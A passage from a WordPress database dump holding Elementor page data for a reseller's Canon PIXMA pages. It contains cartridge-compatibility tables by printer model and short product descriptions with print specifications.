width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX328<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX338<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX347<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX366<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX426<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX876<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX886<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-726 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-725 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-1<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-29 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Dark Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Light Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Yellow)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b7fc065\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"387b65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-10<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-72 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-100<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-42 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Light Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TR8570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS207<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS307<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS5070<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-771 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-770 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-770XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS5170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"736141f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9e8521a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS8270<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS9170<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS9570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7127,3332,'_wp_page_template','template-fullwidth.php'),(7128,3332,'_elementor_edit_mode','builder'),(7129,3332,'_elementor_template_type','post'),(7130,3332,'_elementor_data','[{\"id\":\"9ac79cf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"2a109eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d59285\",\"elType\":\"widget\",\"settings\":{\"title\":\"Injet Printers :-\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca9ead8\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"9a9d292\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"align\":\"center\"},\"elements\":[{\"id\":\"6ad8678\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E560 \\/ E560R\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70128a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\",\"id\":2345}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"509ac9b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Advanced Wireless All-In-One with Auto Duplex\\u00a0Printing for Low-Cost Printing<\\/p><p>The Ink Efficient E560 \\/ E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.<\\/p><p>Available in Black and Red.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO Standard print speed (A4): up to 9.9ipm black \\/ 5.7ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi<\\/p><p>Recommended print volume: 80 - 400 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1ba38c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9b84d1c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"37\",\"right\":\"37\",\"bottom\":\"37\",\"left\":\"37\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"19ec1cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"d3a1ece\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E4270\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"47167d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\",\"id\":2346}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"c56690e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing<\\/p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.<\\/p><p>Print, Scan, Copy, Fax<\\/p><p>ISO standard print speed (A4): 8.8ipm black \\/ 4.4ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct<\\/p><p>Recommended print volume: 50 - 200 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"189f9a2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"df0825f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"11\\\" ]<\\/span><\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"31\",\"right\":\"31\",\"bottom\":\"31\",\"left\":\"31\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"692b43d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a99e262\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS9570\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6a04479\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\",\"id\":2347}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ab42ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>A3 Wireless Photo Printer with Large 4.3\\u201d Touch-Screen and Auto Document Feeder<\\/p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless\\/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 80 - 300 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"657c5e2\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1c9048c\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS8270\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e5da999\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\",\"id\":2348}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8c06b04\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless Photo All-In-One with Large 4.3\\u201d Touch-Screen and Auto Duplex Printing<\\/p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.<\\/p><p>Available in Black, Red and White.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 30 - 100 